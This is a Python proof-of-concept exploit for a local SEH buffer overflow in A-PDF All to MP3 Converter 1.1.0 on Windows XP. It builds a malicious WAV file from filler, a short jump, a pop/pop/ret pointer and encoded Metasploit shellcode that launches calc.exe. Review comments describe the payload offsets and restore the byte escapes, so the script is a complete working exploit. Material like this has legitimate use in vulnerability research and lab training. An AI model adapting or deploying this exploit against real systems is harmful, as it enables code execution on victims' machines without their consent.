# Title : A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit
# Published : 2010-09-17
# Author : modpr0be
#!/usr/bin/python
################################################################################
# Exploit Title: A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit
# Date: September 18, 2010
# Author: modpr0be
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: 1.1.0
# Tested on: Windows XP SP3
#
# Reproduce: open the application --> Next --> Add --> select blah.wav --> calc.exe is launched
#
# Other applications made by a-pdf may be affected.
# This exploit is adapted from EDB 14681 and 14676 (same technique, different target).
# A direct EIP overwrite also works against this target.
#
# thx: amalia, offsec, xecureit, jasakom, oebaj, 0x70y, postnix.
################################################################################
import struct
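# --- Payload layout (file offsets) ------------------------------------------
#   0    .. 4131  junk1      filler up to the SEH record (offset as found by
#                            the author; not derivable from this listing)
#   4132 .. 4135  nseh       short jump over the handler pointer into nops2
#   4136 .. 4139  seh        overwritten handler -> pop/pop/ret gadget
#   4140 .. 4151  nops2      12-byte landing pad
#   4152 .. end   shellcode  msf windows/exec cmd=calc, x86/alpha_upper
#
# NOTE(review): the published listing had every backslash stripped
# ("xebx06x90x90"), so the literals were 3-char ASCII runs rather than the
# intended raw bytes and the file written was not the payload described.
# The \xNN escapes are restored here, everything is kept as `bytes`, and
# the output is opened in binary mode so Windows newline translation can
# never alter the payload (the original text-mode 'w' only worked because
# no 0x0a byte happens to occur in it).
#
# PoC only: the embedded payload launches calc.exe. Run it solely against
# systems you are authorised to test, in an isolated lab.

junk1 = b"A" * 4132

# EB 06 = JMP SHORT +6: the jump is 2 bytes, so +6 skips the two trailing
# NOPs of this field plus the 4-byte handler address and lands on nops2.
nseh = b"\xeb\x06\x90\x90"

# Little-endian pointer to the POP/POP/RET gadget ("ppr" per the author).
# 0x0040xxxx is the range normally occupied by the main executable image,
# which is presumably why the exploit is labelled "Universal" (no OS DLL
# offsets involved) -- confirm the gadget and that the module is not
# SafeSEH/ASLR-protected before porting. The 0x00 high byte is written
# last and is harmless for a file-based vector.
seh = struct.pack('<L', 0x00408B44)

nops2 = b"\x90" * 12

# metasploit payload
# windows/exec cmd=calc | msfencode -e x86/alpha_upper
# size: 462 bytes per the author's comment (len(shellcode) is authoritative)
shellcode = (b"\x89\xe1\xda\xde\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
             b"\x43\x43\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
             b"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
             b"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
             b"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4b\x39\x43\x30\x43"
             b"\x30\x43\x30\x43\x50\x4c\x49\x4d\x35\x46\x51\x48\x52\x43\x54"
             b"\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x46\x32\x44\x4c\x4c\x4b\x50"
             b"\x52\x44\x54\x4c\x4b\x44\x32\x51\x38\x44\x4f\x4e\x57\x50\x4a"
             b"\x51\x36\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x47\x4c\x45"
             b"\x31\x43\x4c\x44\x42\x46\x4c\x47\x50\x49\x51\x48\x4f\x44\x4d"
             b"\x45\x51\x4f\x37\x4d\x32\x4c\x30\x46\x32\x51\x47\x4c\x4b\x46"
             b"\x32\x42\x30\x4c\x4b\x50\x42\x47\x4c\x43\x31\x48\x50\x4c\x4b"
             b"\x47\x30\x43\x48\x4d\x55\x49\x50\x44\x34\x51\x5a\x43\x31\x4e"
             b"\x30\x46\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x50\x58\x47\x50"
             b"\x45\x51\x48\x53\x4d\x33\x47\x4c\x51\x59\x4c\x4b\x50\x34\x4c"
             b"\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c"
             b"\x4f\x31\x48\x4f\x44\x4d\x43\x31\x49\x57\x47\x48\x4b\x50\x44"
             b"\x35\x4c\x34\x43\x33\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x46\x44"
             b"\x42\x55\x4b\x52\x51\x48\x4c\x4b\x51\x48\x51\x34\x43\x31\x48"
             b"\x53\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c"
             b"\x43\x31\x48\x53\x4c\x4b\x45\x54\x4c\x4b\x45\x51\x4e\x30\x4b"
             b"\x39\x50\x44\x47\x54\x46\x44\x51\x4b\x51\x4b\x43\x51\x46\x39"
             b"\x50\x5a\x50\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x51\x4a\x4c"
             b"\x4b\x44\x52\x4a\x4b\x4d\x56\x51\x4d\x42\x4a\x43\x31\x4c\x4d"
             b"\x4c\x45\x48\x39\x43\x30\x45\x50\x43\x30\x50\x50\x43\x58\x50"
             b"\x31\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x49\x45\x4f\x4b\x4c\x30"
             b"\x48\x35\x49\x32\x50\x56\x45\x38\x4e\x46\x4d\x45\x4f\x4d\x4d"
             b"\x4d\x4b\x4f\x48\x55\x47\x4c\x43\x36\x43\x4c\x45\x5a\x4b\x30"
             b"\x4b\x4b\x4b\x50\x42\x55\x43\x35\x4f\x4b\x47\x37\x45\x43\x42"
             b"\x52\x42\x4f\x43\x5a\x43\x30\x50\x53\x4b\x4f\x49\x45\x45\x33"
             b"\x45\x31\x42\x4c\x45\x33\x43\x30\x45\x5a\x41\x41")

payload = junk1 + nseh + seh + nops2 + shellcode


def write_poc(path: str = "blah.wav") -> int:
    """Write the crafted file to *path* and return the number of bytes written.

    The file is opened in binary mode so the payload is stored byte-for-byte.
    """
    with open(path, "wb") as fh:
        return fh.write(payload)


if __name__ == "__main__":
    write_poc()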